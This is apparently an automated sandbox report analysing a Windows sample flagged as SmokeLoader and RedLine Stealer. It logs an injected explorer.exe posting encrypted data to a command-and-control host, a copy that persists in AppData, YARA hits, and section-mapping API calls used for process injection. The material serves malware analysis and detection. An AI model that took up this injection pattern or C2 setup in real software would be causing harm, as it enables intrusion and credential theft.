Oct 1, 2024 15:19:47.790616989 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:55.290777922 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://utvluvviohegxwa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: nwgrus.ru
Oct 1, 2024 15:19:55.290815115 CEST	160	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 0b d8 f6 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu(md[eMctXCHs/A~{x9>40HIz\yM<E
Oct 1, 2024 15:19:56.389751911 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:01.062087059 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gciivaguamcfaiv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: nwgrus.ru
Oct 1, 2024 15:20:01.062105894 CEST	326	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 17 c9 a6 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vuA_Ieuhzl\|Ymz2Po6W2X!}8X"BYC(1%7E5J\)a)"@:/nqN!+n+M<-
Oct 1, 2024 15:20:02.020612955 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:06.362241030 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pdfnugwkpxwacgj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: nwgrus.ru
Oct 1, 2024 15:20:06.362256050 CEST	355	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 07 a5 f0 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vue}OXG1rM\|'\|WD>UwSVMI%,Uv[W'IZ@9FlGs$^aW9Xw+ENkRm`]E
Oct 1, 2024 15:20:07.324738026 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:12.458080053 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dxlshxkdsvnwfeb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: nwgrus.ru
Oct 1, 2024 15:20:12.458101034 CEST	224	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 3a b4 a9 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu~:/QaTVOsb8w53gQMuRL)Y\|w"_lOOp8W`_/:3X5C@hl
Oct 1, 2024 15:20:13.530782938 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:17.967247009 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://snihbsmchoau.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: nwgrus.ru
Oct 1, 2024 15:20:17.967266083 CEST	183	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 09 b5 8f Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu<IA[f;(j:5ayGo)5DYP. E=3CBS}[,"`I?y0IL+
Oct 1, 2024 15:20:19.523677111 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 1, 2024 15:20:19.523772001 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:24.682240009 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://saahpawkqkmb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 238 Host: nwgrus.ru
Oct 1, 2024 15:20:24.682265997 CEST	238	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 44 d5 e4 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu"DeVxJ%PeE@nkrW:\|+d8BGl2(@m~52d~7G/`(f2rH_7}:q,DYbFm$n
Oct 1, 2024 15:20:25.647753954 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:30.557919025 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nuocycmfgie.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 155 Host: nwgrus.ru
Oct 1, 2024 15:20:30.557948112 CEST	155	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 1c c7 9d Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vuwU%\vb\|LH]Vx`%g'IQe:-Dh92NfYP
Oct 1, 2024 15:20:31.521358967 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:35.217917919 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vjpuynmuynejyil.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 192 Host: nwgrus.ru
Oct 1, 2024 15:20:35.217932940 CEST	192	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 33 a0 9c Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu33)hZDfi6d338J jJ,>'^KOOZ*)eY;KCZ_m
Oct 1, 2024 15:20:36.199208021 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:40.145922899 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sbfilscmpife.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: nwgrus.ru
Oct 1, 2024 15:20:40.145936966 CEST	187	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 1d cf ab Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vuR=yqVntZ$<?0r0=(:2wy>5KMvJU*roL]'BfQS3
Oct 1, 2024 15:20:41.110836983 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:46.089329004 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nylkqgrfrnt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: nwgrus.ru
Oct 1, 2024 15:20:46.089354038 CEST	187	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 1b aa 9f Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu}XWYKY_?I`>nU$zy T/U*pAE)W@qRo<)8bp3
Oct 1, 2024 15:20:47.770889997 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 1, 2024 15:20:47.771214008 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 1, 2024 15:20:47.771483898 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:52.905045986 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gnxmthbmvqq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: nwgrus.ru
Oct 1, 2024 15:20:52.905060053 CEST	222	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 3c aa 9c Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu\<QQ*cF!}~i=>9VNx)^5:tMEEY)B-p0MUU0{FH,3R7'[5
Oct 1, 2024 15:20:54.025105953 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	187.131.253.169	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:58.534616947 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yvujkdpmsqqrh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 174 Host: nwgrus.ru
Oct 1, 2024 15:20:58.534627914 CEST	174	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 1d b5 fa Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vuR}7YZiD&U=,guKKOQFNTCl6(@u)\.:8\z
Oct 1, 2024 15:20:59.510467052 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:20:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Target ID:	0
Start time:	09:16:55
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\k8JAXb3Lhs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\k8JAXb3Lhs.exe"
Imagebase:	0x400000
File size:	369'664 bytes
MD5 hash:	EEAD7A529F768CD0A74A639FF806357C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:17:01
Start date:	01/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	09:17:20
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\sfjujsr
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\sfjujsr
Imagebase:	0x400000
File size:	369'664 bytes
MD5 hash:	EEAD7A529F768CD0A74A639FF806357C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:20:01
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\sfjujsr
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\sfjujsr
Imagebase:	0x400000
File size:	369'664 bytes
MD5 hash:	EEAD7A529F768CD0A74A639FF806357C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	42.6%
Signature Coverage:	43.4%
Total number of Nodes:	122
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
